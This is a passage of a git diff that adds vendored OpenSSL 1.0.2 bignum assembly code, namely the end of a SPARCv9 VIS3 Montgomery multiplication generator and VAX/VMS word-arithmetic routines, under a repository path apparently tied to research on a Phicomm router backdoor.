+	addxc	$aj,	%g0,	$hi0	! ahi=aj
+
+	addcc	$nlo,	$hi1,	$lo1
+	addxc	$nj,	%g0,	$hi1
+	addcc	$lo0,	$lo1,	$lo1	! np[j]*m1+ap[j]*bp[0]
+	addxc	%g0,	$hi1,	$hi1
+	stxa	$lo1,	[$tp]0xe2	! tp[j-1]
+	add	$tp,	8,	$tp
+
+	addcc	$hi0,	$hi1,	$hi1
+	addxc	%g0,	%g0,	$ovf	! upmost overflow bit
+	stxa	$hi1,	[$tp]0xe2
+	add	$tp,	8,	$tp
+
+	ba	.Louter
+	sub	$num,	16,	$i	! i=num-2
+
+.align	16
+.Louter:
+	ld	[$bp+0],	$t2	! m0=bp[i]
+	ld	[$bp+4],	$t3
+
+	sub	$anp,	$num,	$anp	! rewind
+	sub	$tp,	$num,	$tp
+	sub	$anp,	$num,	$anp
+
+	add	$bp,	8,	$bp
+	sllx	$t3,	32,	$m0
+	ldx	[$anp+0],	$aj	! ap[0]
+	or	$t2,	$m0,	$m0
+	ldx	[$anp+8],	$nj	! np[0]
+
+	mulx	$aj,	$m0,	$lo0	! ap[0]*bp[i]
+	ldx	[$tp],		$tj	! tp[0]
+	umulxhi	$aj,	$m0,	$hi0
+	ldx	[$anp+16],	$aj	! ap[1]
+	addcc	$lo0,	$tj,	$lo0	! ap[0]*bp[i]+tp[0]
+	mulx	$aj,	$m0,	$alo	! ap[1]*bp[i]
+	addxc	%g0,	$hi0,	$hi0
+	mulx	$lo0,	$n0,	$m1	! tp[0]*n0
+	umulxhi	$aj,	$m0,	$aj	! ahi=aj
+	mulx	$nj,	$m1,	$lo1	! np[0]*m1
+	umulxhi	$nj,	$m1,	$hi1
+	ldx	[$anp+24],	$nj	! np[1]
+	add	$anp,	32,	$anp
+	addcc	$lo1,	$lo0,	$lo1
+	mulx	$nj,	$m1,	$nlo	! np[1]*m1
+	addxc	%g0,	$hi1,	$hi1
+	umulxhi	$nj,	$m1,	$nj	! nhi=nj
+
+	ba	.Linner
+	sub	$num,	24,	$cnt	! cnt=num-3
+.align	16
+.Linner:
+	addcc	$alo,	$hi0,	$lo0
+	ldx	[$tp+8],	$tj	! tp[j]
+	addxc	$aj,	%g0,	$hi0	! ahi=aj
+	ldx	[$anp+0],	$aj	! ap[j]
+	addcc	$nlo,	$hi1,	$lo1
+	mulx	$aj,	$m0,	$alo	! ap[j]*bp[i]
+	addxc	$nj,	%g0,	$hi1	! nhi=nj
+	ldx	[$anp+8],	$nj	! np[j]
+	add	$anp,	16,	$anp
+	umulxhi	$aj,	$m0,	$aj	! ahi=aj
+	addcc	$lo0,	$tj,	$lo0	! ap[j]*bp[i]+tp[j]
+	mulx	$nj,	$m1,	$nlo	! np[j]*m1
+	addxc	%g0,	$hi0,	$hi0
+	umulxhi	$nj,	$m1,	$nj	! nhi=nj
+	addcc	$lo1,	$lo0,	$lo1	! np[j]*m1+ap[j]*bp[i]+tp[j]
+	addxc	%g0,	$hi1,	$hi1
+	stx	$lo1,	[$tp]		! tp[j-1]
+	add	$tp,	8,	$tp
+	brnz,pt	$cnt,	.Linner
+	sub	$cnt,	8,	$cnt
+!.Linner
+	ldx	[$tp+8],	$tj	! tp[j]
+	addcc	$alo,	$hi0,	$lo0
+	addxc	$aj,	%g0,	$hi0	! ahi=aj
+	addcc	$lo0,	$tj,	$lo0	! ap[j]*bp[i]+tp[j]
+	addxc	%g0,	$hi0,	$hi0
+
+	addcc	$nlo,	$hi1,	$lo1
+	addxc	$nj,	%g0,	$hi1	! nhi=nj
+	addcc	$lo1,	$lo0,	$lo1	! np[j]*m1+ap[j]*bp[i]+tp[j]
+	addxc	%g0,	$hi1,	$hi1
+	stx	$lo1,	[$tp]		! tp[j-1]
+
+	subcc	%g0,	$ovf,	%g0	! move upmost overflow to CCR.xcc
+	addxccc	$hi1,	$hi0,	$hi1
+	addxc	%g0,	%g0,	$ovf
+	stx	$hi1,	[$tp+8]
+	add	$tp,	16,	$tp
+
+	brnz,pt	$i,	.Louter
+	sub	$i,	8,	$i
+
+	sub	$anp,	$num,	$anp	! rewind
+	sub	$tp,	$num,	$tp
+	sub	$anp,	$num,	$anp
+	ba	.Lsub
+	subcc	$num,	8,	$cnt	! cnt=num-1 and clear CCR.xcc
+
+.align	16
+.Lsub:
+	ldx	[$tp],		$tj
+	add	$tp,	8,	$tp
+	ldx	[$anp+8],	$nj
+	add	$anp,	16,	$anp
+	subccc	$tj,	$nj,	$t2	! tp[j]-np[j]
+	srlx	$tj,	32,	$tj
+	srlx	$nj,	32,	$nj
+	subccc	$tj,	$nj,	$t3
+	add	$rp,	8,	$rp
+	st	$t2,	[$rp-4]		! reverse order
+	st	$t3,	[$rp-8]
+	brnz,pt	$cnt,	.Lsub
+	sub	$cnt,	8,	$cnt
+
+	sub	$anp,	$num,	$anp	! rewind
+	sub	$tp,	$num,	$tp
+	sub	$anp,	$num,	$anp
+	sub	$rp,	$num,	$rp
+
+	subc	$ovf,	%g0,	$ovf	! handle upmost overflow bit
+	and	$tp,	$ovf,	$ap
+	andn	$rp,	$ovf,	$np
+	or	$np,	$ap,	$ap	! ap=borrow?tp:rp
+	ba	.Lcopy
+	sub	$num,	8,	$cnt
+
+.align	16
+.Lcopy:					! copy or in-place refresh
+	ld	[$ap+0],	$t2
+	ld	[$ap+4],	$t3
+	add	$ap,	8,	$ap
+	stx	%g0,	[$tp]		! zap
+	add	$tp,	8,	$tp
+	stx	%g0,	[$anp]		! zap
+	stx	%g0,	[$anp+8]
+	add	$anp,	16,	$anp
+	st	$t3,	[$rp+0]		! flip order
+	st	$t2,	[$rp+4]
+	add	$rp,	8,	$rp
+	brnz	$cnt,	.Lcopy
+	sub	$cnt,	8,	$cnt
+
+	mov	1,	%o0
+	ret
+	restore
+.type	bn_mul_mont_vis3, #function
+.size	bn_mul_mont_vis3, .-bn_mul_mont_vis3
+.asciz  "Montgomery Multiplication for SPARCv9 VIS3, CRYPTOGAMS by <appro\@openssl.org>"
+.align	4
+___
+
+# Purpose of these subroutines is to explicitly encode VIS instructions,
+# so that one can compile the module without having to specify VIS
+# extentions on compiler command line, e.g. -xarch=v9 vs. -xarch=v9a.
+# Idea is to reserve for option to produce "universal" binary and let
+# programmer detect if current CPU is VIS capable at run-time.
+sub unvis3 {
+my ($mnemonic,$rs1,$rs2,$rd)=@_;
+my %bias = ( "g" => 0, "o" => 8, "l" => 16, "i" => 24 );
+my ($ref,$opf);
+my %visopf = (	"addxc"		=> 0x011,
+		"addxccc"	=> 0x013,
+		"umulxhi"	=> 0x016	);
+
+    $ref = "$mnemonic\t$rs1,$rs2,$rd";
+
+    if ($opf=$visopf{$mnemonic}) {
+	foreach ($rs1,$rs2,$rd) {
+	    return $ref if (!/%([goli])([0-9])/);
+	    $_=$bias{$1}+$2;
+	}
+
+	return	sprintf ".word\t0x%08x !%s",
+			0x81b00000|$rd<<25|$rs1<<14|$opf<<5|$rs2,
+			$ref;
+    } else {
+	return $ref;
+    }
+}
+
+foreach (split("\n",$code)) {
+	s/\`([^\`]*)\`/eval $1/ge;
+
+	s/\b(umulxhi|addxc[c]{0,2})\s+(%[goli][0-7]),\s*(%[goli][0-7]),\s*(%[goli][0-7])/
+		&unvis3($1,$2,$3,$4)
+	 /ge;
+
+	print $_,"\n";
+}
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/vms.mar b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/vms.mar
new file mode 100644
index 0000000..aefab15
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/vms.mar
@@ -0,0 +1,6440 @@
+	.title	vax_bn_mul_add_words  unsigned multiply & add, 32*32+32+32=>64
+;
+; w.j.m. 15-jan-1999
+;
+; it's magic ...
+;
+; ULONG bn_mul_add_words(ULONG r[],ULONG a[],int n,ULONG w) {
+;	ULONG c = 0;
+;	int i;
+;	for(i = 0; i < n; i++) <c,r[i]> := r[i] + c + a[i] * w ;
+;	return c;
+; }
+
+r=4 ;(AP)
+a=8 ;(AP)
+n=12 ;(AP)	n	by value (input)
+w=16 ;(AP)	w	by value (input)
+
+
+	.psect	code,nowrt
+
+.entry	bn_mul_add_words,^m<r2,r3,r4,r5,r6>
+
+	moval	@r(ap),r2
+	moval	@a(ap),r3
+	movl	n(ap),r4	; assumed >0 by C code
+	movl	w(ap),r5
+	clrl	r6		; c
+
+0$:
+	emul	r5,(r3),(r2),r0		; w, a[], r[] considered signed
+
+	; fixup for "negative" r[]
+	tstl	(r2)
+	bgeq	10$
+	incl	r1
+10$:
+
+	; add in c
+	addl2	r6,r0
+	adwc	#0,r1
+
+	; combined fixup for "negative" w, a[]
+	tstl	r5
+	bgeq	20$
+	addl2	(r3),r1
+20$:
+	tstl	(r3)
+	bgeq	30$
+	addl2	r5,r1
+30$:
+
+	movl	r0,(r2)+		; store lo result in r[] & advance
+	addl	#4,r3			; advance a[]
+	movl	r1,r6			; store hi result => c
+
+	sobgtr	r4,0$
+
+	movl	r6,r0			; return c
+	ret
+
+	.title	vax_bn_mul_words  unsigned multiply & add, 32*32+32=>64
+;
+; w.j.m. 15-jan-1999
+;
+; it's magic ...
+;
+; ULONG bn_mul_words(ULONG r[],ULONG a[],int n,ULONG w) {
+;	ULONG c = 0;
+;	int i;
+;	for(i = 0; i < num; i++) <c,r[i]> := a[i] * w + c ;
+;	return(c);
+; }
+
+r=4 ;(AP)
+a=8 ;(AP)
+n=12 ;(AP)	n	by value (input)
+w=16 ;(AP)	w	by value (input)
+
+
+	.psect	code,nowrt
+
+.entry	bn_mul_words,^m<r2,r3,r4,r5,r6>
+
+	moval	@r(ap),r2	; r2 -> r[]
+	moval	@a(ap),r3	; r3 -> a[]
+	movl	n(ap),r4	; r4 = loop count (assumed >0 by C code)
+	movl	w(ap),r5	; r5 = w
+	clrl	r6		; r6 = c
+
+0$:
+	; <r1,r0> := w * a[] + c
+	emul	r5,(r3),r6,r0		; w, a[], c considered signed
+
+	; fixup for "negative" c
+	tstl	r6			; c
+	bgeq	10$
+	incl	r1
+10$:
+
+	; combined fixup for "negative" w, a[]
+	tstl	r5			; w
+	bgeq	20$
+	addl2	(r3),r1			; a[]
+20$:
+	tstl	(r3)			; a[]
+	bgeq	30$
+	addl2	r5,r1			; w
+30$:
+
+	movl	r0,(r2)+		; store lo result in r[] & advance
+	addl	#4,r3			; advance a[]
+	movl	r1,r6			; store hi result => c
+
+	sobgtr	r4,0$
+
+	movl	r6,r0			; return c
+	ret
+
+	.title	vax_bn_sqr_words  unsigned square, 32*32=>64
+;
+; w.j.m. 15-jan-1999
+;
+; it's magic ...
+;
+; void bn_sqr_words(ULONG r[],ULONG a[],int n) {
+;	int i;
+;	for(i = 0; i < n; i++) <r[2*i+1],r[2*i]> := a[i] * a[i] ;
+; }
+
+r=4 ;(AP)
+a=8 ;(AP)
+n=12 ;(AP)	n	by value (input)
+
+
+	.psect	code,nowrt
+
+.entry	bn_sqr_words,^m<r2,r3,r4,r5>
+
+	moval	@r(ap),r2	; r2 -> r[]
+	moval	@a(ap),r3	; r3 -> a[]
+	movl	n(ap),r4	; r4 = n (assumed >0 by C code)
+
+0$:
+	movl	(r3)+,r5		; r5 = a[] & advance
+
+	; <r1,r0> := a[] * a[]
+	emul	r5,r5,#0,r0		; a[] considered signed
+
+	; fixup for "negative" a[]
+	tstl	r5			; a[]
+	bgeq	30$
+	addl2	r5,r1			; a[]
+	addl2	r5,r1			; a[]
+30$:
+
+	movl	r0,(r2)+		; store lo result in r[] & advance
+	movl	r1,(r2)+		; store hi result in r[] & advance
+
+	sobgtr	r4,0$
+
+	movl	#1,r0			; return SS$_NORMAL
+	ret
+
+	.title	vax_bn_div_words  unsigned divide
+;
+; Richard Levitte 20-Nov-2000
+;
+; ULONG bn_div_words(ULONG h, ULONG l, ULONG d)
+; {
+;	return ((ULONG)((((ULLONG)h)<<32)|l) / (ULLONG)d);
+; }
+;
+; Using EDIV would be very easy, if it didn't do signed calculations.
+; Any time any of the input numbers are signed, there are problems,
+; usually with integer overflow, at which point it returns useless
+; data (the quotient gets the value of l, and the remainder becomes 0).
+;
+; If it was just for the dividend, it would be very easy, just divide
+; it by 2 (unsigned), do the division, multiply the resulting quotient
+; and remainder by 2, add the bit that was dropped when dividing by 2
+; to the remainder, and do some adjustment so the remainder doesn't
+; end up larger than the divisor.  For some cases when the divisor is
+; negative (from EDIV's point of view, i.e. when the highest bit is set),
+; dividing the dividend by 2 isn't enough, and since some operations
+; might generate integer overflows even when the dividend is divided by
+; 4 (when the high part of the shifted down dividend ends up being exactly
+; half of the divisor, the result is the quotient 0x80000000, which is
+; negative...) it needs to be divided by 8.  Furthermore, the divisor needs
+; to be divided by 2 (unsigned) as well, to avoid more problems with the sign.
+; In this case, a little extra fiddling with the remainder is required.
+;
+; So, the simplest way to handle this is always to divide the dividend
+; by 8, and to divide the divisor by 2 if it's highest bit is set.
+; After EDIV has been used, the quotient gets multiplied by 8 if the
+; original divisor was positive, otherwise 4.  The remainder, oddly
+; enough, is *always* multiplied by 8.
+; NOTE: in the case mentioned above, where the high part of the shifted
+; down dividend ends up being exactly half the shifted down divisor, we
+; end up with a 33 bit quotient.  That's no problem however, it usually
+; means we have ended up with a too large remainder as well, and the
+; problem is fixed by the last part of the algorithm (next paragraph).
+;
+; The routine ends with comparing the resulting remainder with the
+; original divisor and if the remainder is larger, subtract the
+; original divisor from it, and increase the quotient by 1.  This is
+; done until the remainder is smaller than the divisor.
+;
+; The complete algorithm looks like this:
+;
+; d'    = d
+; l'    = l & 7
+; [h,l] = [h,l] >> 3
+; [q,r] = floor([h,l] / d)	# This is the EDIV operation
+; if (q < 0) q = -q		# I doubt this is necessary any more
+;
+; r'    = r >> 29
+; if (d' >= 0)
+;   q'  = q >> 29
+;   q   = q << 3
+; else
+;   q'  = q >> 30
+;   q   = q << 2
+; r     = (r << 3) + l'
+;
+; if (d' < 0)
+;   {
+;     [r',r] = [r',r] - q
+;     while ([r',r] < 0)
+;       {
+;         [r',r] = [r',r] + d
+;         [q',q] = [q',q] - 1
+;       }
+;   }
+;
+; while ([r',r] >= d')
+;   {
+;     [r',r] = [r',r] - d'
+;     [q',q] = [q',q] + 1
+;   }
+;
+; return q
+
+h=4 ;(AP)	h	by value (input)
+l=8 ;(AP)	l	by value (input)
+d=12 ;(AP)	d	by value (input)
+
+;r2 = l, q
+;r3 = h, r
+;r4 = d
+;r5 = l'
+;r6 = r'
+;r7 = d'
+;r8 = q'
+
+	.psect	code,nowrt
+
+.entry	bn_div_words,^m<r2,r3,r4,r5,r6,r7,r8>
+	movl	l(ap),r2
+	movl	h(ap),r3
+	movl	d(ap),r4
+
+	bicl3	#^XFFFFFFF8,r2,r5 ; l' = l & 7
+	bicl3	#^X00000007,r2,r2
+
+	bicl3	#^XFFFFFFF8,r3,r6
+	bicl3	#^X00000007,r3,r3
+        
+	addl	r6,r2
+
+	rotl	#-3,r2,r2	; l = l >> 3
+	rotl	#-3,r3,r3	; h = h >> 3
+                
+	movl	r4,r7		; d' = d
+
+	movl	#0,r6		; r' = 0
+	movl	#0,r8		; q' = 0
+
+	tstl	r4
+	beql	666$		; Uh-oh, the divisor is 0...
+	bgtr	1$
+	rotl	#-1,r4,r4	; If d is negative, shift it right.
+	bicl2	#^X80000000,r4	; Since d is then a large number, the
+				; lowest bit is insignificant
+				; (contradict that, and I'll fix the problem!)
+1$:     
+	ediv	r4,r2,r2,r3	; Do the actual division
+
+	tstl	r2
+	bgeq	3$
+	mnegl	r2,r2		; if q < 0, negate it
+3$:     
+	tstl	r7
+	blss	4$
+	rotl	#3,r2,r2	;   q = q << 3
+	bicl3	#^XFFFFFFF8,r2,r8 ;    q' gets the high bits from q
+	bicl3	#^X00000007,r2,r2
+	bsb	41$
+4$:				; else
+	rotl	#2,r2,r2	;   q = q << 2
+	bicl3	#^XFFFFFFFC,r2,r8 ;   q' gets the high bits from q
+	bicl3	#^X00000003,r2,r2
+41$:
+	rotl	#3,r3,r3	; r = r << 3
+	bicl3	#^XFFFFFFF8,r3,r6 ; r' gets the high bits from r
+	bicl3	#^X00000007,r3,r3
+	addl	r5,r3		; r = r + l'
+
+	tstl	r7
+	bgeq	5$
+	bitl	#1,r7
+	beql	5$		; if d' < 0 && d' & 1
+	subl	r2,r3		;   [r',r] = [r',r] - [q',q]
+	sbwc	r8,r6
+45$:
+	bgeq	5$		;   while r < 0
+	decl	r2		;     [q',q] = [q',q] - 1
+	sbwc	#0,r8
+	addl	r7,r3		;     [r',r] = [r',r] + d'
+	adwc	#0,r6
+	brb	45$
+
+; The return points are placed in the middle to keep a short distance from
+; all the branch points
+42$:
+;	movl	r3,r1
+	movl	r2,r0
+	ret
+666$:
+	movl	#^XFFFFFFFF,r0
+	ret
+
+5$:
+	tstl	r6
+	bneq	6$
+	cmpl	r3,r7
+	blssu	42$		; while [r',r] >= d'
+6$:
+	subl	r7,r3		;   [r',r] = [r',r] - d'
+	sbwc	#0,r6
+	incl	r2		;   [q',q] = [q',q] + 1
+	adwc	#0,r8
+	brb	5$	
+
+	.title	vax_bn_add_words  unsigned add of two arrays
+;
+; Richard Levitte 20-Nov-2000
+;
+; ULONG bn_add_words(ULONG r[], ULONG a[], ULONG b[], int n) {
+;	ULONG c = 0;
+;	int i;
+;	for (i = 0; i < n; i++) <c,r[i]> = a[i] + b[i] + c;
+;	return(c);
+; }
+
+r=4 ;(AP)	r	by reference (output)
+a=8 ;(AP)	a	by reference (input)
+b=12 ;(AP)	b	by reference (input)
+n=16 ;(AP)	n	by value (input)
+
+
+	.psect	code,nowrt
+
+.entry	bn_add_words,^m<r2,r3,r4,r5,r6>
+
+	moval	@r(ap),r2
+	moval	@a(ap),r3
+	moval	@b(ap),r4
+	movl	n(ap),r5	; assumed >0 by C code
+	clrl	r0		; c
+
+	tstl	r5		; carry = 0
+	bleq	666$
+
+0$:
+	movl	(r3)+,r6	; carry untouched
+	adwc	(r4)+,r6	; carry used and touched
+	movl	r6,(r2)+	; carry untouched
+	sobgtr	r5,0$		; carry untouched
+
+	adwc	#0,r0
+666$:
+	ret
+
+	.title	vax_bn_sub_words  unsigned add of two arrays
+;
+; Richard Levitte 20-Nov-2000
+;
+; ULONG bn_sub_words(ULONG r[], ULONG a[], ULONG b[], int n) {
+;	ULONG c = 0;
+;	int i;
+;	for (i = 0; i < n; i++) <c,r[i]> = a[i] - b[i] - c;
+;	return(c);
+; }
+
+r=4 ;(AP)	r	by reference (output)
+a=8 ;(AP)	a	by reference (input)
+b=12 ;(AP)	b	by reference (input)
+n=16 ;(AP)	n	by value (input)
+
+
+	.psect	code,nowrt
+
+.entry	bn_sub_words,^m<r2,r3,r4,r5,r6>
+
+	moval	@r(ap),r2
+	moval	@a(ap),r3
+	moval	@b(ap),r4
+	movl	n(ap),r5	; assumed >0 by C code
+	clrl	r0		; c
+
+	tstl	r5		; carry = 0
+	bleq	666$
+
+0$:
+	movl	(r3)+,r6	; carry untouched
+	sbwc	(r4)+,r6	; carry used and touched
+	movl	r6,(r2)+	; carry untouched
+	sobgtr	r5,0$		; carry untouched
+
+	adwc	#0,r0
+666$:
+	ret
+
+
+;r=4 ;(AP)
+;a=8 ;(AP)
+;b=12 ;(AP)
+;n=16 ;(AP)	n	by value (input)
+
+	.psect	code,nowrt
+
+.entry	BN_MUL_COMBA8,^m<r2,r3,r4,r5,r6,r7,r8,r9,r10,r11>
+	movab	-924(sp),sp
+	clrq	r8
+
+	clrl	r10
+
+	movl	8(ap),r6
+	movzwl	2(r6),r3
+	movl	12(ap),r7
+	bicl3	#-65536,(r7),r2
+	movzwl	2(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,(r6),-12(fp)
+	bicl3	#-65536,r3,-16(fp)
+	mull3	r0,-12(fp),-4(fp)
+	mull2	r2,-12(fp)
+	mull3	r2,-16(fp),-8(fp)
+	mull2	r0,-16(fp)
+	addl3	-4(fp),-8(fp),r0
+	bicl3	#0,r0,-4(fp)
+	cmpl	-4(fp),-8(fp)
+	bgequ	noname.45
+	addl2	#65536,-16(fp)
+noname.45:
+	movzwl	-2(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-16(fp)
+	bicl3	#-65536,-4(fp),r0
+	ashl	#16,r0,-8(fp)
+	addl3	-8(fp),-12(fp),r0
+	bicl3	#0,r0,-12(fp)
+	cmpl	-12(fp),-8(fp)
+	bgequ	noname.46
+	incl	-16(fp)
+noname.46:
+	movl	-12(fp),r1
+	movl	-16(fp),r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.47
+	incl	r2
+noname.47:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.48
+	incl	r10
+noname.48:
+
+	movl	4(ap),r11
+	movl	r9,(r11)
+
+	clrl	r9
+
+	movzwl	2(r6),r2
+	bicl3	#-65536,4(r7),r3
+	movzwl	6(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,(r6),-28(fp)
+	bicl3	#-65536,r2,-32(fp)
+	mull3	r0,-28(fp),-20(fp)
+	mull2	r3,-28(fp)
+	mull3	r3,-32(fp),-24(fp)
+	mull2	r0,-32(fp)
+	addl3	-20(fp),-24(fp),r0
+	bicl3	#0,r0,-20(fp)
+	cmpl	-20(fp),-24(fp)
+	bgequ	noname.49
+	addl2	#65536,-32(fp)
+noname.49:
+	movzwl	-18(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-32(fp)
+	bicl3	#-65536,-20(fp),r0
+	ashl	#16,r0,-24(fp)
+	addl3	-24(fp),-28(fp),r0
+	bicl3	#0,r0,-28(fp)
+	cmpl	-28(fp),-24(fp)
+	bgequ	noname.50
+	incl	-32(fp)
+noname.50:
+	movl	-28(fp),r1
+	movl	-32(fp),r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.51
+	incl	r2
+noname.51:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.52
+	incl	r9
+noname.52:
+
+	movzwl	6(r6),r2
+	bicl3	#-65536,(r7),r3
+	movzwl	2(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,4(r6),-44(fp)
+	bicl3	#-65536,r2,-48(fp)
+	mull3	r0,-44(fp),-36(fp)
+	mull2	r3,-44(fp)
+	mull3	r3,-48(fp),-40(fp)
+	mull2	r0,-48(fp)
+	addl3	-36(fp),-40(fp),r0
+	bicl3	#0,r0,-36(fp)
+	cmpl	-36(fp),-40(fp)
+	bgequ	noname.53
+	addl2	#65536,-48(fp)
+noname.53:
+	movzwl	-34(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-48(fp)
+	bicl3	#-65536,-36(fp),r0
+	ashl	#16,r0,-40(fp)
+	addl3	-40(fp),-44(fp),r0
+	bicl3	#0,r0,-44(fp)
+	cmpl	-44(fp),-40(fp)
+	bgequ	noname.54
+	incl	-48(fp)
+noname.54:
+	movl	-44(fp),r1
+	movl	-48(fp),r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.55
+	incl	r2
+noname.55:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.56
+	incl	r9
+noname.56:
+
+	movl	r8,4(r11)
+
+	clrl	r8
+
+	movzwl	10(r6),r2
+	bicl3	#-65536,(r7),r3
+	movzwl	2(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,8(r6),-60(fp)
+	bicl3	#-65536,r2,-64(fp)
+	mull3	r0,-60(fp),-52(fp)
+	mull2	r3,-60(fp)
+	mull3	r3,-64(fp),-56(fp)
+	mull2	r0,-64(fp)
+	addl3	-52(fp),-56(fp),r0
+	bicl3	#0,r0,-52(fp)
+	cmpl	-52(fp),-56(fp)
+	bgequ	noname.57
+	addl2	#65536,-64(fp)
+noname.57:
+	movzwl	-50(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-64(fp)
+	bicl3	#-65536,-52(fp),r0
+	ashl	#16,r0,-56(fp)
+	addl3	-56(fp),-60(fp),r0
+	bicl3	#0,r0,-60(fp)
+	cmpl	-60(fp),-56(fp)
+	bgequ	noname.58
+	incl	-64(fp)
+noname.58:
+	movl	-60(fp),r1
+	movl	-64(fp),r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.59
+	incl	r2
+noname.59:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.60
+	incl	r8
+noname.60:
+
+	movzwl	6(r6),r2
+	bicl3	#-65536,4(r7),r3
+	movzwl	6(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,4(r6),-76(fp)
+	bicl3	#-65536,r2,-80(fp)
+	mull3	r0,-76(fp),-68(fp)
+	mull2	r3,-76(fp)
+	mull3	r3,-80(fp),-72(fp)
+	mull2	r0,-80(fp)
+	addl3	-68(fp),-72(fp),r0
+	bicl3	#0,r0,-68(fp)
+	cmpl	-68(fp),-72(fp)
+	bgequ	noname.61
+	addl2	#65536,-80(fp)
+noname.61:
+	movzwl	-66(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-80(fp)
+	bicl3	#-65536,-68(fp),r0
+	ashl	#16,r0,-72(fp)
+	addl3	-72(fp),-76(fp),r0
+	bicl3	#0,r0,-76(fp)
+	cmpl	-76(fp),-72(fp)
+	bgequ	noname.62
+	incl	-80(fp)
+noname.62:
+	movl	-76(fp),r1
+	movl	-80(fp),r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.63
+	incl	r2
+noname.63:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.64
+	incl	r8
+noname.64:
+
+	movzwl	2(r6),r2
+	bicl3	#-65536,8(r7),r3
+	movzwl	10(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,(r6),-92(fp)
+	bicl3	#-65536,r2,-96(fp)
+	mull3	r0,-92(fp),-84(fp)
+	mull2	r3,-92(fp)
+	mull3	r3,-96(fp),-88(fp)
+	mull2	r0,-96(fp)
+	addl3	-84(fp),-88(fp),r0
+	bicl3	#0,r0,-84(fp)
+	cmpl	-84(fp),-88(fp)
+	bgequ	noname.65
+	addl2	#65536,-96(fp)
+noname.65:
+	movzwl	-82(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-96(fp)
+	bicl3	#-65536,-84(fp),r0
+	ashl	#16,r0,-88(fp)
+	addl3	-88(fp),-92(fp),r0
+	bicl3	#0,r0,-92(fp)
+	cmpl	-92(fp),-88(fp)
+	bgequ	noname.66
+	incl	-96(fp)
+noname.66:
+	movl	-92(fp),r1
+	movl	-96(fp),r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.67
+	incl	r2
+noname.67:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.68
+	incl	r8
+noname.68:
+
+	movl	r10,8(r11)
+
+	clrl	r10
+
+	movzwl	2(r6),r2
+	bicl3	#-65536,12(r7),r3
+	movzwl	14(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,(r6),-108(fp)
+	bicl3	#-65536,r2,-112(fp)
+	mull3	r0,-108(fp),-100(fp)
+	mull2	r3,-108(fp)
+	mull3	r3,-112(fp),-104(fp)
+	mull2	r0,-112(fp)
+	addl3	-100(fp),-104(fp),r0
+	bicl3	#0,r0,-100(fp)
+	cmpl	-100(fp),-104(fp)
+	bgequ	noname.69
+	addl2	#65536,-112(fp)
+noname.69:
+	movzwl	-98(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-112(fp)
+	bicl3	#-65536,-100(fp),r0
+	ashl	#16,r0,-104(fp)
+	addl3	-104(fp),-108(fp),r0
+	bicl3	#0,r0,-108(fp)
+	cmpl	-108(fp),-104(fp)
+	bgequ	noname.70
+	incl	-112(fp)
+noname.70:
+	movl	-108(fp),r1
+	movl	-112(fp),r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.71
+	incl	r2
+noname.71:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.72
+	incl	r10
+noname.72:
+
+	movzwl	6(r6),r2
+	bicl3	#-65536,8(r7),r3
+	movzwl	10(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,4(r6),-124(fp)
+	bicl3	#-65536,r2,-128(fp)
+	mull3	r0,-124(fp),-116(fp)
+	mull2	r3,-124(fp)
+	mull3	r3,-128(fp),-120(fp)
+	mull2	r0,-128(fp)
+	addl3	-116(fp),-120(fp),r0
+	bicl3	#0,r0,-116(fp)
+	cmpl	-116(fp),-120(fp)
+	bgequ	noname.73
+	addl2	#65536,-128(fp)
+noname.73:
+	movzwl	-114(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-128(fp)
+	bicl3	#-65536,-116(fp),r0
+	ashl	#16,r0,-120(fp)
+	addl3	-120(fp),-124(fp),r0
+	bicl3	#0,r0,-124(fp)
+	cmpl	-124(fp),-120(fp)
+	bgequ	noname.74
+	incl	-128(fp)
+noname.74:
+	movl	-124(fp),r1
+	movl	-128(fp),r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.75
+	incl	r2
+noname.75:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.76
+	incl	r10
+noname.76:
+
+	movzwl	10(r6),r2
